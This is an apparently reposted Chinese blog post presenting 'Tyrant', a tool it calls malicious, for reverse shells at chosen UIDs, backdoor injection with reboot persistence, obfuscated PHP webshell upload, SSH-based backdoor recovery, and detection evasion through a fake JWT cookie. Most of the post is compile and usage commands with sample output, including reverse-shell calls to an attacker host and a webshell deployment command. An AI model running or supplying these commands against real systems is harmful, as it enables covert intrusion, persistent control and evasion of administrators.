Tyrant(暴君):反向Shell-后门注入与持久化控制的渗透测试工具

news/2025/2/4 13:42:11 标签: backdoor

Tyrant

请添加图片描述

Tyrant 是一款用于渗透测试和远程控制持久化的恶意工具,具备以下功能:

  • 反向Shell:允许攻击者通过指定用户UID进行反弹对应权限的Shell会话。
  • 后门注入与持久化:在目标系统中注入后门并确保即使重启后依然能恢复控制。
  • Tyrant Web Shell 上传:通过Web访问上传并执行Tyrant的反向Shell。
  • 加密与伪协议:通过虚假的JWT和加密通信绕过安全检测。
  • SSH恢复:可通过SSH连接恢复并启动后门。

更多信息和下载请访问:Tyrant GitHub 地址

编译 V2

首先安装依赖包:

# sudo apt-get install zlib1g-dev libzstd-dev

然后编译 Tyrant:

$ gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd

请添加图片描述

发行版 V2

也可以从以下地址下载 Tyrant V2 发行版:

下载链接

请添加图片描述

Tyrant 初始化

将 Tyrant 上传到目标服务器并执行:

(Target) $ ./tyrant -h

请添加图片描述

PS: 初次运行需要 ROOT 权限!

(Target) # chmod +x tyrant
(Target) # ./tyrant

请添加图片描述

Tyrant反向SHELL

Username             UID      Home Directory                
--------             ----     ------------                  
root                 0        /bin/bash                     
daemon               1        /usr/sbin/nologin             
bin                  2        /usr/sbin/nologin             
sys                  3        /usr/sbin/nologin             
sync                 65534    /bin/sync                     
games                60       /usr/sbin/nologin             
man                  12       /usr/sbin/nologin             
lp                   7        /usr/sbin/nologin             
mail                 8        /usr/sbin/nologin             
news                 9        /usr/sbin/nologin             
uucp                 10       /usr/sbin/nologin             
proxy                13       /usr/sbin/nologin             
www-data             33       /usr/sbin/nologin             
backup               34       /usr/sbin/nologin             
list                 38       /usr/sbin/nologin             
irc                  39       /usr/sbin/nologin             
gnats                41       /usr/sbin/nologin             
nobody               65534    /usr/sbin/nologin             
systemd-network      102      /usr/sbin/nologin             
systemd-resolve      103      /usr/sbin/nologin             
syslog               106      (null)                        
messagebus           107      (null)                        
_apt                 65534    (null)                        
lxd                  65534    (null)                        
uuidd                110      (null)                        
dnsmasq              65534    /usr/sbin/nologin             
landscape            112      (null)                        
pollinate            1        (null)                        
sshd                 65534    (null)                        
bob                  1004     /bin/bash                     
statd                65534    (null)                        
peter                1005     /bin/bash                     
insecurity           0        (null)                        
susan                1006     /bin/rbash                   
ntp                  113      (null) 
(Target) $ ./tyrant -uid 0 -rhost 192.168.8.102 -rport 443

请添加图片描述

后门模式 && 持久化控制

注入后门

(Target) $ ./tyrant -b &

请添加图片描述

查看后门信息

(Target) $ tyrant

请添加图片描述

上传 Tyrant-webshell

(Self) $ python tyrant_per.py -h

请添加图片描述

PS: id为机子的mid

(Self) $ python tyrant_per.py -id 01a2a9a7d07c4cf1881f57374930be93 -gen

请添加图片描述

通过混淆 PHP 代码后上传 PHP 文件:

PHP 混淆工具

(Self) $ python3 tyrant_per.py -id 01a2a9a7d07c4cf1881f57374930be93 -uid 0 -rhost 192.168.8.102 -rport 443 -url http://192.168.8.103:8080/tyrant.php

请添加图片描述

PS: 你必须提供正确的 mid 值,否则服务端将无法验证通过。

重启自动载入后门

当首次启动后门程序后,持久化后门将自动写入关机重启定时任务:

请添加图片描述

后门恢复

当主后门程序被删除时,可以通过执行子程序恢复主程序后门。

利用 Web(tyran-persisten)自动恢复 Tyrant 后门

(Self) $ python3 tyrant_per.py -id 01a2a9a7d07c4cf1881f57374930be93 -uid 0 -rhost 192.168.8.102 -rport 443 -url http://192.168.8.103:8080/tyrant.php

请添加图片描述

请添加图片描述

执行命令再次重载启动后门:

(Target) $ ls /usr/local/bin

请添加图片描述

利用 SSH 自动恢复 Tyrant 后门

(Self) $ ssh bob@192.168.8.103

请添加图片描述

执行新后门:

(Self) $ 7a3e88a5ad1a1d87e10df9fe807d7625 &

请添加图片描述

关于我使用的加密技术 && 伪协议 && 虚假的 JWT && 镜像加密算法

通过模拟中间人劫持,Tyrant 的攻击载荷存在 Cookie 中,我可以:

请添加图片描述

Cookie: tyrant=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.SxMIVkMDQwdVUQUCDQJRVQgPUlJWUQIPDAhVBVVWDgcJAlFQBABSFUgSQgpQQVwTCBodREdfXERAGwkSU1wLHQEHWRxZF1AHVhIbQUYTCUNMGgtEAQMAFUk.Ag5WWgUFAQMGAQ

通过这个虚假的 JWT,轻松混淆并绕过管理员的审查。

请添加图片描述

防止重放攻击

请添加图片描述

服务端通过验证时间戳来判断数据包是否超时:

请添加图片描述

可以通过设置 ./php/rev 中的 timeout 字段来决定数据包的生产周期,这通常是以秒为单位。

请添加图片描述


http://www.niftyadmin.cn/n/5841602.html

相关文章

八. Spring Boot2 整合连接 Redis(超详细剖析)

八. Spring Boot2 整合连接 Redis(超详细剖析) 文章目录 八. Spring Boot2 整合连接 Redis(超详细剖析)2. 注意事项和细节3. 最后: 在 springboot 中 , 整合 redis 可以通过 RedisTemplate 完成对 redis 的操作, 包括设置数据/获取数据 比如添加和读取数据 具体整…

Unity特效插件GodFX

2022Unity安装使用方法​​,将MinDrawer.cs文件MinAttribute改成UnityEngine.PostProcessing.MinAttribute 参考链接: Unity3D特效插件GodFX使用教程_哔哩哔哩_bilibili

核心集:DeepCore: A Comprehensive Library for CoresetSelection in Deep Learning

目录 一、TL;DR 二、为什么研究核心集? 三、问题定义和如何做 3.1 问题定义 3.2 业界方法 3.2.1 基于几何的方法 3.2.2 基于不确定性的方法 3.2.3 基于误差/损失的方法 3.2.5 GraNd 和 EL2N 分数 3.2.6 重要性采样 3.2.7 基于决策边界的办法 …

Weevely代码分析

亲测php5和php8都无效,只有php7有效 ailx10 1949 次咨询 4.9 网络安全优秀回答者 互联网行业 安全攻防员 去咨询 上一次做weevely实验可以追溯到2020年,当时还是weevely3.7,现在的是weevely4 生成php网页木马依然差不多…… php菜刀we…

Flask代码审计实战

文章目录 Flask代码审计SQL注入命令/代码执行反序列化文件操作XXESSRFXSS其他 审计实战后记reference Flask代码审计 SQL注入 1、正确的使用直白一点就是:使用”逗号”,而不是”百分号” stmt "SELECT * FROM table WHERE id?" connectio…

chrome浏览器chromedriver下载

chromedriver 下载地址 https://googlechromelabs.github.io/chrome-for-testing/ 上面的链接有和当前发布的chrome浏览器版本相近的chromedriver 实际使用感受 chrome浏览器会自动更新,可以去下载最新的chromedriver使用,自动化中使用新的chromedr…

浅谈《图解HTTP》

感悟 滑至尾页的那一刻,内心突兀的涌来一阵畅快的感觉。如果说从前对互联网只是懵懵懂懂,但此刻却觉得她是如此清晰而可爱的呈现在哪里。 介绍中说,《图解HTTP》适合作为第一本网络协议书。确实,它就像一座桥梁,连接…

C语言自定义数据类型详解(二)——结构体类型(下)

书接上回,前面我们已经给大家介绍了如何去声明和创建一个结构体,如何初始化结构体变量等这些关于结构体的基础知识。下面我们将继续给大家介绍和结构体有关的知识: 今天的主题是:结构体大小的计算并简单了解一下位段的相关知识。…